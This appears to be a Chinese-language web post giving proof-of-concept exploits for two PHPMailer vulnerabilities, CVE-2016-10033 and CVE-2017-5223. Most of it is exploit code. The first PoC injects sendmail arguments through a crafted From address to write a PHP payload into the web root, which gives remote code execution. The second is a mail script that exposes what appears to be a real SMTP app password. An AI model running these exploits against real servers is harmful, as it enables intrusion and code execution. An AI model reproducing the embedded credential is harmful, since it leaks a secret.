php mail执行命令,PHPMailer 命令执行 任意文件读取漏洞利用 【含POC】

PHPMailer 命令执行漏洞(CVE-2016-10033)

漏洞编号：CVE-2016-10033

影响版本：PHPMailer< 5.2.18

漏洞级别： 高危

漏洞POC：

PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)

A simple PoC (working on Sendmail MTA)

It will inject the following parameters to sendmail command:

Arg no. 0 == [/usr/sbin/sendmail]

Arg no. 1 == [-t]

Arg no. 2 == [-i]

Arg no. 3 == [-fattacker\]

Arg no. 4 == [-oQ/tmp/]

Arg no. 5 == [-X/var/www/cache/phpcode.php]

Arg no. 6 == [some"@email.com]

which will write the transfer log (-X) into /var/www/cache/phpcode.php file.

The resulting file will contain the payload passed in the body of the msg:

<<< --b1_cb4566aa51be9f090d9419163e492306

<<< Content-Type: text/html; charset=us-ascii

<<<

<<< <?php phpinfo(); ?> 09607 <<<

<<<

<<<

<<< --b1_cb4566aa51be9f090d9419163e492306--

See the full advisory URL for details.

*/ // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com';

$msg_body = "<?php phpinfo(); ?>"; // ------------------ // mail() param injection via the vulnerability in PHPMailer require_once('class.phpmailer.php');

$mail = new PHPMailer(); // defaults to using php "mail()" $mail->SetFrom($email_from, 'Client Name');

$address = "customer_feedback@company-X.com";

$mail->AddAddress($address, "Some User");

$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";

$mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo;

} else { echo "Message sent!\n";

}

PHPMailer任意文件读取漏洞分析(CVE-2017-5223)

漏洞编号： CVE-2017-5223

影响版本： PHPMailer <= 5.2.21

漏洞级别： 高危

漏洞POC：

#Author:Yxlink

require_once('PHPMailerAutoload.php');

$mail = new PHPMailer();

$mail->isSMTP();

$mail->Host = 'smtp.qq.com';

$mail->Port = 465;

$mail->SMTPAuth = true;

$mail->Username = xxxx@qq.com'; //qq邮箱

$mail->Password = 'zsuhxbmsaioxbcgb';//申请配置邮件客户端获取到的16位密码和qq密码不一样

$mail->SMTPSecure = 'ssl';

$mail->CharSet = "UTF-8";

$mail->Encoding = "base64";

$mail->Subject = "hello";

$mail->From = "xxxx@qq.com";

$mail->FromName = "test";

$address = "xxxx@qq.com";

$mail->AddAddress($address, "test");

$mail->AddAttachment('test.txt','test.txt');

$mail->IsHTML(true);

$msg="test";

$mail->msgHTML($msg);

if(!$mail->Send()) {

echo "Mailer Error: " . $mail->ErrorInfo;

} else {

echo "Message sent!";

}

?>